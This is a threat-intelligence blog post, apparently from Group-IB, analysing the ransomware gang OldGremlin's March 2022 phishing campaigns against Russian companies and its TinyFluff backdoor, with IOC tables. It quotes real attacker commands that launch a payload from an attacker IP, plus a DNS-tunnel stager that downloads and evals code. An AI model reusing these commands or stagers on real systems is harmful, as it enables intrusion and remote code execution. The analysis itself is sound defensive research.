{ "id": "e9aa2252-b8e8-417f-b160-947a0ec149fa", "created_at": "2026-04-06T00:09:30.043674Z", "updated_at": "2026-04-10T03:36:13.891382Z", "deleted_at": null, "sha1_hash": "d9056345b03e60f700efe8c67e0187c4975a7fb4", "title": "OldGremlin group, phishing ransomware comeback | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 163926, "plain_text": "Ivan Pisarev\r\nTechnical Head, META\r\nOld Gremlins, new methods\r\nRussian-speaking ransomware gang OldGremlin resumes attacks in Russia\r\nApril 14, 2022 · min to read · Ransomware\r\n← Blog\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 1 of 31\n\nOldGremlin Ransomware Russia\r\nUntil recently, Russian-speaking cyber threat actors shared an unspoken rule: do not attack Russian\r\ncompanies. Groups that violated the rule were few and far between, and OldGremlin was one of\r\nthem. Since spring 2020, when the “gremlins” were first uncovered by Group-IB Threat\r\nIntelligence analysts, the hackers have been attacking Russian businesses, including banks,\r\nindustrial enterprises, medical organizations, and software developers.\r\nAccording to a Singapore-based cybersecurity company Group-IB, over the past two years\r\nOldGremlin has conducted 13 malicious email campaigns. The year 2020 was the most fruitful:\r\nten campaigns, with emails purporting to be from a Russian metallurgical holding, the Belarusian\r\nplant MTZ, a dental clinic, and the media holding RBC, nine of which were described in Group-IB’s\r\n2020 report. One more campaign was discovered later in the year.\r\nAfter the first attacks, it became clear that OldGremlin prepares their phishing emails with great care\r\nand monitors the news agenda closely. Their choices for email subjects included remote work\r\nduring the pandemic, protests in Belarus, and an interview request from a known financial journalist\r\nworking for a Russian media outlet, called RBC.\r\nAnother OldGremlin hallmark is that the group conducts multi-stage targeted attacks using\r\nsophisticated tactics and techniques. For example, they did not send their TinyCryptor\r\nransomware directly by email; instead they first obtained remote access to the victim’s machine.\r\nThe latter was used as a springboard to conduct reconnaissance, collect data, and then move\r\nlaterally across the organization’s network.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 2 of 31\n\nOldGremlin history\r\nOldGremlin launched only one mass phishing email campaign in 2021 (in February), but it was so\r\nsuccessful that, apparently, it fueled the gang for the entire year. A few months later, Group-IB team\r\ndiscovered that the February email campaign was the initial entry point and source of a number of\r\nattacks. Moreover, last year OldGremlin became the greediest cybergang targeting Russia: they\r\ndemanded as much as $3 million from one of their victims.\r\nIn late March 2022, OldGremlin put themselves on the radar with two malicious email\r\ncampaigns. As in past attacks, the group bombarded Russian companies with another batch of\r\nemails exploiting trending news topics. This time they played the sanctions card, masquerading as\r\nrepresentatives of a Russian financial organization.\r\nGiven the fact that many international providers of email security products suspended operations\r\non the Russian market, the campaigns of OldGremlin and other threat actors that use email at\r\nthe initial stage are likely to become more successful and frequent.\r\nHaving identified one potential victim (a mining company), Group-IB Computer Emergency\r\nResponse team (CERT-GIB) warned the company in question about the threat.\r\nIn this blog post, Group-IB experts share technical descriptions of OldGremlin’s new attacks and\r\ntools and map the group’s main tactics, techniques and procedures (TTPs) to the MITRE ATT\u0026CK™\r\nframework.\r\nMarch 22 Campaign\r\nA new OldGremlin‘s attack was detected on March 22, 2022. Before the campaign, on March 2, the\r\nattackers registered the domain mirfinance[.]org with namecheap, set it up with the public email\r\nservice Yandex.Mail and sent malicious emails to Russian companies. The use of public legitimate\r\nemail service sometimes allows the attackers to bypass traditional security systems.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 3 of 31\n\nDNS records for mirfinance[.]org. Source: Group-IB Threat Intelligence\r\nAs mentioned above, carefully crafted phishing emails are OldGremlin’s hallmark. This time the\r\nemails were allegedly sent by a senior accountant of a financial organization in Russia who warned\r\nthe recipients about new sanctions that would completely suspend operations of Visa/Mastercard\r\npayment systems. Notably, the phishing emails were sent two weeks after Visa and Mastercard\r\nannounced they would suspend operations in Russia.\r\n“All cards issued in our country [Russia] will no longer work,” the phishing email said and prompted\r\nthe recipients to urgently issue a new banking card and link it to the bank payroll.\r\nOldGremlin’s phishing email from the March 22 campaign\r\nTranslation of the phishing email: arrow_drop_down\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 4 of 31\n\nTo have a new payment card “issued”, the client was supposed to read the guidelines and fill out a\r\nquestionnaire. In reality, the emails contained links to a malicious document stored in Dropbox:\r\nhxxps://dl[.]dropboxusercontent[.]com/s/1956cypkkihawuu/Anketa.docx?dl=0. The document\r\nlooked as follows:\r\nMalicious document stored in Dropbox\r\nIt is noteworthy that in February 2021, the threat actor sent emails leveraging a malicious\r\ndocument containing a similar Office 365 image. The campaign affected multiple companies,\r\nand OldGremlin is still reaping the benefits, as they are known for dwelling in the victims’\r\ninfrastructure for a long time before proceeding to the next stage.\r\nTo return to the recent attack, the infection scheme is presented below for clarity:\r\nTranslation: arrow_drop_down\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 5 of 31\n\nOldGremlin’s March 22 attack\r\nOnce opened, the document loads a template located at\r\nhxxps://dl[.]dropboxusercontent[.]com/s/gjyjs0rbtihy7ue/Doc1.dotm. The template contains a\r\nmacro that performs the following actions:\r\nThe archive contained the group’s new tool, which — judging by the PDB string — the developer\r\nnamed TinyFluff. TinyFluff is a successor to the gang’s custom backdoor called TinyNode, which\r\nOldGremlin used as the primary downloader for receiving and running malicious scripts. The\r\npurpose of TinyFluff was to launch the interpreter Node.js on the infected device and grant remote\r\naccess to it (a detailed description of the interpreter can be found in the “Tools” section).\r\nThe key features of this version of TinyFluff are:\r\n1. Copies the original file (Anketa.docx) to the path %TEMP%\\docx1.zip.\r\nExtracts an executable file from the archive embedded in the original document to the path\r\n%TEMP%\\word\\media\\image2.jpg, renames the file to image2.exe and launches it.\r\n2.\r\n3. Displays an error and closes the document.\r\n1. The application downloads Node.js from the official website.\r\n2. JavaScript is embedded in the file body.\r\nIt does not contain a hardcoded command and control (C2) address; instead the application\r\nuses DGA.\r\n3.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 6 of 31\n\nAmong the generated domains, two definitely belonged to the attackers. The rest were either not\r\nregistered at the time of analysis or Group-IB experts could not find evidence that they were\r\ninvolved in the attack:\r\nDomain NS-subdomain\r\nIP addresses of NS-subdomains\r\neccbc8[.]com\r\nns1[.]eccbc8[.]com ns2[.]eccbc8[.]com\r\nns3[.]eccbc8[.]com ns4[.]eccbc8[.]com\r\n46.101.113[.]161\r\n161.35.41[.]9\r\na3c65c[.]org\r\nns1[.]a3c65c[.]org ns2[.]a3c65c[.]org\r\nns3[.]a3c65c[.]org ns4[.]a3c65c[.]org\r\n46.101.113[.]161\r\n161.35.41[.]9\r\nWe will return to the table above, but for now we will continue to describe the cyber kill chain.\r\nGroup-IB’s Managed XDR extracted some of the JavaScripts used in this campaign. In particular,\r\nGroup-IB detected an interesting — though still “raw” — script with a wide functionality:\r\nOldGremlin’s March 25 attack\r\nThree days later, on March 25, the group launched a new campaign, but using a more simplified\r\ntoolkit. The likely reason for this is that the final script used in the previous attack was not yet ready\r\nfor full-fledged use in the wild. It required additional testing and additional features. The bad news is\r\nthat OldGremlin will most likely perfect their script and use it in future attacks.\r\nUnfortunately, Group-IB has not yet uncovered any email samples (if you have received one, please\r\nlet us know), but our specialists did reconstruct the second attack.\r\n4. All communication with C2 servers is performed through a DNS tunnel.\r\nCommunication with the C2 server through a DNS tunnel\r\nGathering information about infected devices\r\nStealing files from infected devices\r\nDownloading arbitrary files from servers\r\nDeploying a SOCKS server to proxy traffic\r\nExecuting arbitrary JS code\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 7 of 31\n\nOldGremlin’s March 25 attack\r\nThe attack was identified following the analysis of OldGremlin’s infrastructure. Group-IB discovered\r\ntwo LNK files that were associated with the IP address 46.101.113[.]161 (used to resolve NS records\r\nfor subdomains from the previous malicious email campaign). Both files were located in archives\r\navailable for downloading from Dropbox:\r\nName SHA1 Links\r\nAkt_sverki.zip dda9900cefa8cdc8ec362d80480ba6c4cfdc62b2 hXXps://dl.dropboxuser\r\nhXXps://dl.dropboxuser\r\nhXXps://dl.dropboxuser\r\nhXXps://dl.dropboxuser\r\nDopSog_Consult.zip ae52c93c16c63aac9be778e89157b67c7bc7c61c\r\nhXXps://dl.dropboxuser\r\ndl=0\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 8 of 31\n\nName SHA1 Links\r\nhXXps:://dl.dropboxuse\r\nGroup-IB experts believe that the above links were embedded in the emails sent by the group.\r\nWhen launched, the LNK files executed the following commands:\r\nLNK name Command\r\nDopSog_Consultant.docx.lnk\r\n“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start\r\n\\\\192.248.176[.]138\\DavWWWRoot\\DopSog_Consultant.docx\r\n\u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\nAkt_sverki_Consultant.docx.lnk\r\n“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start\r\n\\\\192.248.176[.]138\\DavWWWRoot\\Akt_sverki_Consultant.docx\r\n\u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\nHere is what happened: using WebDAV protocol the threat actors mapped the network drive\r\nhxxp://192.248.176[.]138, displayed the decoy document (DopSog_Consultant.docx or\r\nAkt_sverki_Consultant.docx), and launched the malicious executable file tf.exe. The decoy\r\ndocuments looked as follows:\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 9 of 31\n\nDecoy document Akt_sverki_Consultant.docx (Translation: Reconciliation certificate)\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 10 of 31\n\nDecoy document DopSog_Consultant.docx (Translation: Supplementary Agreement). Obviously,\r\nthe legitimate company Consultant Plus has nothing to do with documents used in the campaign.\r\nThe payload, as you may have guessed, is TinyFluff. Unlike the file used in the March 22 campaign,\r\nhowever, this version does not have a built-in script and does not download the Node.js interpreter\r\nfrom the official website. Instead, the application copies both the script and the interpreter from its\r\nown current location, i.e., from the network drive 192.248.176[.]138.\r\nThe final-stage script is much simpler than the above version. It lacks both DGA (the IP address\r\n46.101.113[.]161 is specified as C2) and data encryption. In fact, all communication between the\r\nTrojan and C2 could be viewed using an ordinary traffic sniffer.\r\nGroup-IB experts retrieved several JS commands that were executed on the infected device. They\r\nwere all designed to obtain information about an infected device. They even included CMD\r\ncommands (as described in the corresponding section).\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 11 of 31\n\nTools used by OldGremlin group\r\nTinyFluff\r\nAs mentioned above, Group-IB experts detected two versions of TinyFluff:\r\nCampaign date SHA1\r\n2022-03-25 c82e12e563d5d5f4a8dd67703b5df7373b457abc\r\n2022-03-22 bd0a6a3628f268a37ac9d708d03f57feef5ed55e\r\nLet’s begin with the tf.exe file (SHA1: c82e12e563d5d5f4a8dd67703b5df7373b457abc) as the tool is\r\nmuch simpler than its predecessor. Once launched, the application creates the directory\r\n%APPDATA%\\%MachineGuid%, where %MachineGuid% is the registry value for\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid. If the directory\r\nalready exists, the application terminates itself. The application copies the interpreter Node.js\r\n(node.exe) and the malicious script s.txt to the created directory. The script is heavily obfuscated,\r\nbut if it can be run then there is no need to waste time on de-obfuscation because the obfuscated\r\nlayer restarts Node.js and passes a “clean” script to it as an argument.\r\nHow Group-IB Managed XDR’s module called Malware Detonation Platform lays the attack\r\nAs seen in the screenshot, the argument of the second node.exe process is a script without\r\nobfuscation. Its functionality is simple: it connects to the address 46.101.113[.]161:80, passes the\r\nformat identifier /{0.[0-9]*/}, receives the command in a loop, and executes it (using the function\r\neval). The commands are described in detail in the relevant section.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 12 of 31\n\nAlthough the second version of TinyFluff (SHA1: bd0a6a3628f268a37ac9d708d03f57feef5ed55e)\r\nwas discovered earlier (and the compilation date is more recent), it is more sophisticated. Just like\r\nthe previous version, it places the script and the interpreter in the directory\r\n%APPDATA%\\%MachineGuid%. However, the interpreter is downloaded from the official website:\r\nhttp://nodejs.org/dist/latest-erbium/win-x86/node.exe, and the malicious script is located in a\r\nresource of the executable file named TXT. As in the above case, the de-obfuscated script can be\r\nobtained from an argument of the node.exe child process:\r\nSource: Group-IB Managed XDR\r\nThis time the script is more complicated. For example, it doesn’t have a built-in C2 list. Instead, the\r\nscript uses DGA:\r\nconst a=[0…0x1e4] const tld=[\".com\",\".org\",\".net\"],\r\ndomain=crypto.createHash(\"md5\").update(a.toString()).digest(\"hex\").slice(0,6)+tld[f]\r\nFor each domain, the script generates a subdomain in the format [0-9a-f]{4}.[0-9a-f]\r\n{8}.%dga_domain%, creates a DNS query, and receives a TXT record. The tool carries out all\r\ncommunication through a DNS tunnel, which means that all the data transmitted by the Trojan is in\r\na subdomain and the server’s response is in a TXT record. We will not dwell on this any further as\r\nwe believe that all interaction with the server occurs in this way.\r\nThe script verifies the digital signature of the received data using the function crypto.verify with the\r\nbase64-encoded key\r\nMCowBQYDK2VwAyEAgp0p9o6lg/ZZ3WUJtx7UBBb1qYMZEDNC19Hbb84wt88= (in DER\r\nformat). If the signature is valid, the script generates a bot identifier (a number from 0 to 1), after\r\nwhich it requests a command from the C2 server in a loop. The response is obfuscated. De-obfuscation is performed as follows:\r\n1. Data is Base64-decoded.\r\nData is decrypted using the RC4 algorithm (in such requests, the key is %id%.%dga_domain%,\r\nwhich is the domain to which a connection was made).\r\n2.\r\n3. The decrypted data is decompressed using the gzip algorithm.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 13 of 31\n\nThe above described algorithm is used to de-obfuscate all traffic between the malware and the C2\r\nserver, with only the key changing (going forward we will therefore only say that the data is de-obfuscated using a given key). After de-obfuscation, a JS script is immediately executed by the\r\ninterpreter. The textual description is complicated, so let’s illustrate it using a sample analyzed by the\r\nMalware Detonation Platform. Registration looked as follows:\r\nThe example above shows that the domain eccbc8[.]com was generated using DGA and that\r\n0.058106102444631436 is the bot’s unique identifier. The screenshot shows two TXT responses,\r\nbut at this stage we are only interested in the first one:\r\nVl1Ok4WH0QkAA3xSgGwyotPYGd0Q4X4LeLYTqO0mgklgbunlqCBxhnEilFysI2UrJWKsy0Q+B\r\nWe will return to the second response later. If you use the following script:\r\ncrypto=require(\"crypto\"), global.dec=(key,ciphertext)=\u003e{ const\r\na=require(\"crypto\").createDecipheriv(\"rc4\",key,null), k=a.update(ciphertext,\"base64\"),\r\nb=require(\"zlib\").gunzipSync(k); return a.final(),b.toString() }\r\nand the key 0.058106102444631436.eccbc8[.]com, you will receive the first command:\r\nlet C = 0, P = \"\", K = \"lin9gtmn\", R = () =\u003e { require(\"dns\").resolveTxt(\"0x\" + C + \".\" + K +\r\n\".eccbc8[.]com\", (e, d) =\u003e { if (d) { if (P += d.join(\"\"), C++, C \u003c 23) return R(); try {\r\neval(global.dec(K, P)) } catch (a) {} } }) }; R()\r\nAs can be seen, the first command is designed to download and run the next-stage tool. To do so, it\r\nperforms 23 DNS queries (such as 0x%chank_number%.lin9gtmn.eccbc8[.]com), concatenates the\r\nresponses into a string, de-obfuscates it using the key lin9gtmn, and launches it. An example of\r\nsuch requests:\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 14 of 31\n\n0x0.lin9gtmn.eccbc8[.]com 0x1.lin9gtmn.eccbc8[.]com ... 0x22.lin9gtmn.eccbc8[.]com\r\nThe resulting script has many functions, including:\r\nIt is noteworthy that at the time of analysis, the resulting script was unfinished: Group-IB\r\nresearchers came across errors in the script code and the persistence function was commented out.\r\nMoreover, from all the above functions, the script only performs one, namely collecting information\r\nabout the infected device in a JSON object in the following format:\r\n{ \"transfer\": { \"threads\": \"global.threads\", \"tick\": \"global.tick\", \"domain\": \"global.dom\" }, \"paths\": {\r\n\"temp\": \"os.tmpdir()\", \"home\": \"os.homedir()\" }, \"proc\": { \"load\": \"os.loadavg()\", \"cpus\": \"os.cpus()\" },\r\n\"mem\": { \"total\": \"os.totalmem()\", \"free\": \"os.freemem()\" }, \"network\": { \"interfaces\":\r\n\"os.networkInterfaces()\" }, \"sys\": { \"hostName\": \"os.hostname()\", \"type\": \"os.type()\", \"platform\":\r\n\"os.platform()\", \"release\": \"os.release()\", \"uptime\": \"os.uptime()\" }, \"user\": \"os.userInfo()\" }\r\nThe data is once again obfuscated using the lin9gtmn key, split into chunks of 60 bytes, and sent\r\nas several requests in the following format:\r\n1x%chank_number%.%key%.%random_string{8}%.%hex_chunk%.eccbc8[.]com\r\nPolygon example:\r\nSending multiple DNS queries at the same time\r\nGathering information about infected devices\r\nStealing files from infected devices\r\nDownloading arbitrary files from servers\r\nDeploying a SOCKS server to proxy traffic\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 15 of 31\n\n1x2.lin9gtmn.v937nf2g.01e35a4076d1b5a1f285b49c11d2a96230b8ce152e9b3877243b7e5234\r\nIn response, the server sends an obfuscated JavaScript to be executed. In our case, Group-IB\r\nexperts did not receive any additional commands. However, do you remember that we planned to\r\nreturn to the second response? Here it is:\r\nThe second command from the server after de-obfuscation looks as follows:\r\nif(global.connect)global.connect()\r\nAnd this script runs the second large piece of code from the final-stage script. First, the code makes\r\na request to the server in order to obtain connection parameters. The request is as follows:\r\n2x.%uid%.%id%%rand_string{2}%.%dga_domain%\r\nPolygon example:\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 16 of 31\n\n2x.058106102444631436.079i4mjd6c.eccbc8[.]com\r\nThe response is data in the format %threads%:%width%:%expire%, obfuscated with the %id% key.\r\nTo avoid overloading the article with in-depth technical details, we will not describe what these fields\r\nmean. We will only note that these variables are responsible for the number of simultaneous DNS\r\nrequests, the number of simultaneously processed commands from the server, and the run time of\r\nthe command handler script.\r\nHaving obtained the connection parameters, the script launches the function used to handle\r\ncommands from the server. The function makes a request to the server in order to receive\r\ncommands:\r\n3x.%uid%.%dga_domain%\r\nPolygon example:\r\n3x.058106102444631436.eccbc8[.]com\r\nThe script processes the following commands:\r\nCommand Parameter Short description\r\nEmpty line File name\r\nDownload the file to the infected device. As a result, the code\r\ncannot be executed correctly because the command parameters\r\nare parsed with an error.\r\n.download:\r\nFile\r\ndescription\r\nRead the contents of a file from the working directory.\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 17 of 31\n\nCommand Parameter Short description\r\n.set:\r\nthreads\r\ntick_sec\r\nChange the parameters for connecting to the server, where threads\r\nis the number of simultaneously executed DNS requests and\r\ntick_sec is the time for requesting a new command.\r\nAny other\r\nThe o tp t ill be for arded to this proc stdin\r\nIt is worth noting that this section of the code logs the progress of its work, but in order to transfer\r\ndata to the server the code uses the function this.send (not defined in the code). The function\r\naccepts this.proc.stdout as the first argument. Moreover, the result of the .download: command is\r\nprocessed in the same way. This evidence may indicate that this piece of code is still being\r\ndeveloped.\r\nThe code also contains two functions whose names speak for themselves: _socks and _eval.\r\nGroup-IB experts have not seen them being used in the code, which means that they can probably\r\nbe called on the server’s command. Moreover, the threat actors commented out a part of the script\r\ncode that ensures persistence in the system by creating the file OneDrive.cmd in the\r\nMicrosoft\\Windows\\Start Menu\\Programs\\Startup directory and adding to it a command to start\r\nthe Node.js interpreter with the s.txt argument.\r\nCommands\r\nAs mentioned above, on March 25, Group-IB experts obtained and analyzed several commands.\r\nThe commands were being used for reconnaissance, after which the attackers (or their script)\r\nrealized that the application was launched in a test environment and sent a command to terminate\r\nthe interpreter. All commands were sent in clear text, which made it possible to examine them using\r\na traffic sniffer:\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 18 of 31\n\nAn example of traffic between an infected device and a server\r\nCommands can be divided by functionality into six scripts that\r\nperform the following actions:\r\n1. Collecting information about the infected system/device:\r\nCPU\r\nComputer name, memory capacity\r\nNetwork information (IP and MAC addresses)\r\nOS information\r\nPath to the %Temp% directory\r\nSystem run time\r\n2. Obtaining information about connected drives\r\nLaunching the cmd.exe shell, executing a command, and sending the output to C2. During\r\nour research, the following commands were executed:\r\n3.\r\nipconfig /all\r\nkill\r\nObtaining information about the plugins installed in the system. At the time of research\r\nno plugins had been loaded, so we have only their names:\r\n4.\r\nTSFR\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 19 of 31\n\nGroup-IB researchers did not manage to obtain more commands during the analysis, but even\r\nbased on this short list, we can conclude that OldGremlin prepared a sufficient number of scripts to\r\nensure full-fledged post-exploitation.\r\nConclusion\r\nAfter a long break of more than a year, in March 2022 the ransomware gang OldGremlin resumed\r\ntheir malicious email campaigns targeting Russian companies. They remain one of the very few\r\nRussian-speaking ransomware gangs operating in Russia. As in their past attacks, the gremlins used\r\ncarefully crafted fake emails, an up-to-date news agenda, and new custom tools. The latter included\r\nTinyFluff, which we analyzed in detail. We have reason to believe that the new campaigns may\r\nhave infected a large number of companies and that in the coming months the attackers will slowly\r\nand carefully move through their infrastructure, bypassing existing security systems.\r\nTo prevent ransomware attacks, Group-IB recommends that companies use Group-IB Managed\r\nXDR to protect their infrastructure against targeted attacks and proactively hunt for threats using\r\nThreat Intelligence data. We also advise cybersecurity analysts to explore the list of OldGremlin’s\r\ntactics, techniques and procedures shared below, which is mapped to the MITRE ATT\u0026CK matrix.\r\nGroup-IB’s Threat Intelligence team will continue to monitor the group’s activities and promptly\r\nnotify customers about any new attacks.\r\nSHLL\r\nNESC\r\nPRSE/PRST\r\nFWSE\r\nSPPU/SPPR\r\nSRPU/SRPR\r\nATSE\r\n5. Obtaining information about files in the following directories:\r\nThe directory in which the malicious script and the Node.js interpreter are located\r\nC:\\\r\nC:\\Users\r\nC:\\Users\\\u003c%username%\u003e\r\nC:\\Users\\\u003c%username%\u003e\\Downloads\r\n6. Terminating the Node.js interpreter\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 20 of 31\n\nTry Group-IB Threat Intelligence Now\r\nOptimize strategic, operational and tactical decision making with best-in-class threat\r\nintelligence\r\nMITRE\r\nTest Drive Group-IB Threat Intelligence\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 21 of 31\n\nIOCs\r\nNetwork\r\nDomains\r\nDescription Value\r\nDomain mirfinance[.]org\r\nRegistrar namecheap, inc\r\nReg date 2022-03-02\r\nExp date 2023-03-02\r\nTXT record v=spf1 redirect=_spf.yandex.net\r\nIP 192.64.119[.]190\r\nDescription Value\r\nDomain eccbc8[.]com\r\nRegistrar namecheap, inc\r\nReg date 2022-03-02\r\nExp date 2023-03-02\r\nIP –\r\nDescription Value\r\nDomain a3c65c[.]org\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 22 of 31\n\nDescription Value\r\nRegistrar namecheap, inc\r\nReg date 2021-12-07\r\nExp date 2022-12-07\r\nIP –\r\nDomain NS-subdomain IPs of ns-subdomains\r\neccbc8[.]com\r\nns1[.]eccbc8[.]com ns2[.]eccbc8[.]com\r\nns3[.]eccbc8[.]com ns4[.]eccbc8[.]com\r\n46.101.113[.]161\r\n161.35.41[.]9\r\na3c65c[.]org\r\nns1[.]a3c65c[.]org ns2[.]a3c65c[.]org ns3[.]a3c65c[.]org\r\nns4[.]a3c65c[.]org\r\n46.101.113[.]161\r\n161.35.41[.]9\r\nFiles\r\n2022-03-22\r\nDescription Value\r\nLink hxxps://dl[.]dropboxusercontent[.]com/s/1956cypkkihawuu/Anketa.docx?dl=0\r\nName Anketa.docx\r\nMD5 70F4416F6EC6C0DBF916A717BC4A612F\r\nIPs arrow_drop_down\r\nURLs arrow_drop_down\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 23 of 31\n\nDescription Value\r\nSHA1 AF3190DE95DD187661D0866404B087EC7BB8C6BA\r\nSHA256 700FC6C697A869CC978D042B024E59C5FCD4E8905C2FBC7CAEEB3760C2905B\r\nSize 137,081 bytes\r\nType Initial malicious document\r\nDescription Value\r\nLink hxxps://dl[.]dropboxusercontent[.]com/s/gjyjs0rbtihy7ue/Doc1.dotm\r\nName Doc1.dotm\r\nMD5 669cd24d66587ebdbb709302ed011c0e\r\nSHA1 313c8241e0c74fac52530c55089979ac4763e0e2\r\nSHA256 ea95c527da29ca29072617dce28a567d11a7c777f2fcc2a752d0dff626180e70\r\nSize 17,778 bytes\r\nType Malicious template\r\nDescription Value\r\nName image2.jpg, image2.exe\r\nMD5 B59B53C35F03CFF659F848297BCF3314\r\nSHA1 BD0A6A3628F268A37AC9D708D03F57FEEF5ED55E\r\nSHA256 4682A66EFA7C79AB56DFDFC1BBA5CF001D380D516FF1B64ACEA0B53784FDE8C\r\nSize 104,448 bytes\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 24 of 31\n\nDescription Value\r\nCompilation\r\ntimestamp\r\n2022-03-20 13:25:12 UTC\r\nPDB Z:\\TinyFluff\\Release\\TinyFluff.pdb\r\nDescription Value\r\nName s.txt\r\nMD5 FC763A77DFFDBBC62D256524CD4808D9\r\nSHA1 FAB504D579B2E1AAE8701EA1BDA3F3A8B694927F\r\nSHA256 476852E3257631D6AC2882237CFA146DCAEFE17A10A11B984AEC5CC9B61D48D4\r\nSize 16,092 bytes\r\n2022-03-25\r\nDescription Value\r\nName DopSog_Consult.zip\r\nMD5 3e4ab86263e0ff5a35f2e3fb17d03727\r\nSHA1 ae52c93c16c63aac9be778e89157b67c7bc7c61c\r\nSHA256 09c0ac9e09f91a415f674c6cd27b1cc44d8c695da6a449d6baf70107027af2fa\r\nSize 987 bytes\r\nType Archive with LNK\r\nLNK hash e1b5fc5df05b25fc7136cf9b7ea252e50ebff2ef\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 25 of 31\n\nDescription Value\r\nName Akt_sverki.zip\r\nMD5 64db43f22430e75716aacd7ca13bbac6\r\nSHA1 dda9900cefa8cdc8ec362d80480ba6c4cfdc62b2\r\nSHA256 f1102cceed4e6529f8c5b1bf387b798bfba727b49c4a7442b19c392335291cab\r\nSize 1,002 bytes\r\nType Archive with LNK\r\nLNK hash 3c1b1942537ee273325b02ec305bb02e2d0a02f8\r\nDescription Value\r\nName Akt_sverki.zip\r\nMD5 0c46a727d2b9d6e0d1c3bee3b9e90abf\r\nSHA1 1e22af4c6e4dfe625043dddde295fef84bd36ab9\r\nSHA256 bc7ccad7d1ed91a45e792866ff9a060414c1d3c2f9ae8f06689cb96a2e3957a6\r\nSize 1,018 bytes\r\nType Archive with LNK\r\nLNK hash 3C1B1942537EE273325B02EC305BB02E2D0A02F8\r\nDescription Value\r\nName DopSog_Consultant.docx.lnk\r\nMD5 858d14841bc1cc90e8e24a51aca814e1\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 26 of 31\n\nDescription Value\r\nSHA1 e1b5fc5df05b25fc7136cf9b7ea252e50ebff2ef\r\nSHA256 f36305e01515b73607f0f8941d9093fabe1b7a7e3f90c18f137403a0f016cdff\r\nSize 1,610 bytes\r\nType Malicious LNK\r\nCommand\r\n“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start\r\n\\\\192.248.176[.]138\\DavWWWRoot\\DopSog Consultant.docx \u0026\u0026 start /b\r\nDescription Value\r\nName Akt_sverki_Consultant.docx.lnk\r\nMD5 e8fce013184401fb8d6e248fc91b4f9e\r\nSHA1 3c1b1942537ee273325b02ec305bb02e2d0a02f8\r\nSHA256 0a0889330501ee52ca5fe2b2f41fbcad7d26afce8bc430c7fe274e6ebe64c680\r\nSize 1,618 bytes\r\nType Malicious LNK\r\nCommand\r\nline\r\n“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start\r\n\\\\192.248.176[.]138\\DavWWWRoot\\DopSog_Consultant.docx \u0026\u0026 start /b\r\n\\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\nDescription Value\r\nName Akt_sverki_Consultant.docx\r\nMD5 e959fa8191ca2e4dd99932e149668ade\r\nSHA1 79526eaf1489762ca1deca358d6742f9c1718ca6\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 27 of 31\n\nDescription Value\r\nSHA256 4ff26fed848df58550c656fb1676a9afded48060381c55d45154a90a3272ba9e\r\nSize 22,614 bytes\r\nType Decoy document\r\nDescription Value\r\nName DopSog_Consultant.docx\r\nMD5 0ead98011c8d777fd2772d41ab990111\r\nSHA1 9569f635576ec5460571ca6ee02f9b01f39956ea\r\nSHA256 990ef464d76b206e4727ee9ccba9c0be33a278a26116c3c2c839125abc97777f\r\nSize 24,551 bytes\r\nType Decoy document\r\nDescription Value\r\nName tf.exe\r\nMD5 9dc7f56d0bb5d7543d0ea4a644110623\r\nSHA1 c82e12e563d5d5f4a8dd67703b5df7373b457abc\r\nSHA256 8f3747775a1bdeae4627763687bdcb2ef325874e7a908f3ec24380c5d2f2b44a\r\nSize 88,576 bytes\r\nCompilation\r\ntimestamp\r\n2022-03-24 09:02:10 UTC\r\nPDB Z:\\WebFluffPP\\Release\\TinyFluff.pdb\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 28 of 31\n\nDescription Value\r\nName s.txt\r\nMD5 1ddda12e2a8594bc458dbf22b4b39c27\r\nSHA1 dbaad9f3af3e48da6ef6a93747b2a1939ffa4b3d\r\nSHA256 2b507a5d9af760667e18cd11584816575d102d7e9e1900de29b8513d30f6d65c\r\nSize 8,392 bytes\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged 